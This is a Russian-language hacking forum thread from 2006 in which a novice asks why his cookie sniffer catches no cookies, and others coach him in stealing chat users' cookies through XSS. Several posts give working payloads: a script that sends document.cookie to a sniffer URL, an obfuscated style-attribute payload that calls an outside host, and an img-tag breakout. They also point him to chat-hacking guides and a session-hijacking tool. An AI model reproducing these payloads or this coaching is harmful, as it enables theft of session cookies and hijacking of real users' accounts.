Просмотр полной версии : Народ помогите
x[M]akep
26.03.2006, 15:42
Народ помогите! Со снифером! почему когда я оставляю ссылку на снивер и ктонить на ней кликнет то в логе вот такая ЖОПА:
[Sun Mar 26 15:35:10 2006] IP=89.54.80.70 SITE=
REFERER=
QUERY=MT=1
AGENT=
[Sun Mar 26 15:33:56 2006] IP=207.46.98.148 SITE=
REFERER=
QUERY=
AGENT=msnbot/1.0 (+http://search.msn.com/msnbot.htm)
Никаких куков ГДЕ ОНИ куда пропали!?!?!?!? :confused: :confused: :confused:
ИЛИ я чет нитак делаю помогите плиз!
vorishka
26.03.2006, 15:57
ты забыл document.cookie
может даже у чела оутпост стоит и перекрывает рефер
x[M]akep
26.03.2006, 18:44
ты забыл document.cookie
Я просто новичек в этом деле :) Че это такое document.cookie??? :confused:
<script>img = new Image(); img.src = "http://путь_к_снифферу/s.jpg?"+document.cookie;</script>
x[M]akep
26.03.2006, 20:53
<script>img = new Image(); img.src = "http://путь_к_снифферу/s.jpg?"+document.cookie;</script>Но насколько я знаю такой скрипт подходит не для всех ЧАТОВ! или я ОШИБАЮСЬ? Если он для всех то где его тогда нужно писать? :confused:
Если в чате есть XSS, то почему нет! Писать его надо там где пропускает html теги. А вообще то УЧИ МАТ ЧАСТЬ!
К примеру можешь писать в поле ник или цвет
Оставить ссылку на сниффер не достаточно.. Нужно сначало найти уязвимость, хсс в данному случае, а тогда уже внедрять ссылку на сниффер с кражой куков. А то, что они просто кликнут на линк, кроме айпи, тебе больше ничего не даст.
1ten0.0net1
27.03.2006, 02:32
2 Автар А как же у тебя логи снифер пишет, если ты не знаешь куда вставлять скрипт???
x[M]akep
27.03.2006, 17:21
Если в чате есть XSS, то почему нет! Писать его надо там где пропускает html теги. А вообще то УЧИ МАТ ЧАСТЬ!
А как научится определять XSS
x[M]akep
27.03.2006, 17:26
Я качал я VIDEO.ANTICHAT.RU ролики и там вот напримере muz-tv_chat-xss чувак пишет:
В поле "О себе"
' style='background:url(javascript:document.images[1].src=/http:xxantichat.ruxcgi-binxs.jpg?/.sourse.replace(/x/g,String.fromCharcode(47))+opener.location)' s
ОТКУДА ОН ВАЩЕ ЭТО ВЗЯЛ? Откуда узнал что это сработает?
исходный код посмотри и всё поймёшь...
x[M]akep
27.03.2006, 17:59
исходный код посмотри и всё поймёшь...
Код чего :confused: сайта :confused:
akep']Код чего :confused: сайта :confused:
html код страницы куда впихнётся твой код с xss из поля "О себе" "
x[M]akep
27.03.2006, 18:19
html код страницы куда впихнётся твой код с xss из поля "О себе" "
ты конечно извини за мою надоедливость но вот еще тебе вопросик: Как понять можно ли туда его запихнуть или нельзя? Что для этого нужно знать?
p.s. SORRI народ вы не думайте что я ламер но просто мне хочется узнать чуть больше обо всем этом!!! И к томуже вы тоже у когото этому научились :) так помогите и мне :)
Хм... Почитай статьи на ачате про взлом чатов... Тебе станет немного понятней, что это =)
http://antichat.ru/crackchat/index.html
http://antichat.ru/txt/old/chat_faq.shtm
http://antichat.ru/crackchat/java.htmll
Поищи в интернете в гугле www.google.com мануалы по XSS что да как и всё поймёш....
x[M]akep
27.03.2006, 19:50
ПАСИБ! :) А что надо знать чтобы этим заниматся :confused:
http://antichat.ru/txt/old/chat_faq.shtm
http://antichat.ru/crackchat/java.htmll
http://antichat.ru/txt/old/chat_faq.shtml
http://antichat.ru/crackchat/java.html
это так к слову... :D
собственно вот в чём суть, если мы впишем в графе фото http://url_фотки/nax.jpg, то в окне "о себе" в html коде мы получим:
<img src="http://url_фотки/nax.jpg">
там в чате фильтровались некоторые символы, я точно не помню какие влом смотреть...
собственно если вписать в графе фото http://url_фотки/nax.jpg"><script>alert("nax")</script>, то на выходе получим:
<img src="http://url_фотки/nax.jpg"><script>alert("nax")</script>">
я думаю тут нечего объяснять... это сработает только если символы не фильтруются!!!
дальше работает знание и воображение :D
http://ha.ckers.org/xss.html - тут можешь посмотреть множество реализация javascript'ов, поможет в дальнейшем освоении xss
а чтобы понимать xss нужно знание html и javascript
x[M]akep
27.03.2006, 20:29
http://antichat.ru/txt/old/chat_faq.shtml
http://antichat.ru/crackchat/java.html
это так к слову... :D
собственно вот в чём суть, если мы впишем в графе фото http://url_фотки/nax.jpg, то в окне "о себе" в html коде мы получим:
<img src="http://url_фотки/nax.jpg">
там в чате фильтровались некоторые символы, я точно не помню какие влом смотреть...
собственно если вписать в графе фото http://url_фотки/nax.jpg"><script>alert("nax")</script>, то на выходе получим:
<img src="http://url_фотки/nax.jpg"><script>alert("nax")</script>">
я думаю тут нечего объяснять... это сработает только если символы не фильтруются!!!
дальше работает знание и воображение :D
http://ha.ckers.org/xss.html - тут можешь посмотреть множество реализация javascript'ов, поможет в дальнейшем освоении xss
а чтобы понимать xss нужно знание html и javascript
БОЛЬШОЕ ПИСИБО!!! У меня вопросик к тебе ышо один будет! :) ты знаешь какиенить ресерсы на которых можно подробно узнать о html и javascript?
А то в i-nete много таких а толку от них 0. Напиши если знаешь! Буду очень признателен:)
http://www.yandex.ru/yandsearch?rpt=rad&text=%F3%F7%E5%E1%ED%E8%EA+html
http://www.yandex.ru/yandsearch?text=%F3%F7%E5%E1%ED%E8%EA+javascript&stype=www
x[M]akep
28.03.2006, 19:18
ПАСИБ буду учить! Читать! :) :) :)
Мдя а сам найти не мог книги???
x[M]akep
28.03.2006, 21:32
НАРОД! У мну вопросик!
Вот допустим есть чат на котором можно воткнуть картинку но только загрузкой с компа!
Внимание вопрос:
Можноли использовать это для того чтобы запустить СНИФЕР :confused:
Я тк думую эта фишка почти во всех чатах и сней не запустиш снифер.
x[M]akep
28.03.2006, 21:51
а если допусим я получил куки! а в чите скрипт отключающий правую кнопку мыши, его можно какнить обойти :confused:
А зачем тебе вообше правая конпка ?
x[M]akep
28.03.2006, 22:26
А зачем тебе вообше правая конпка ?
ну чтобы воспользоватся IE_XSS_Kit
x[M]akep
29.03.2006, 20:03
народ а какие еще можно использовать программы кроме IE_XSS_Kit :confused:
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot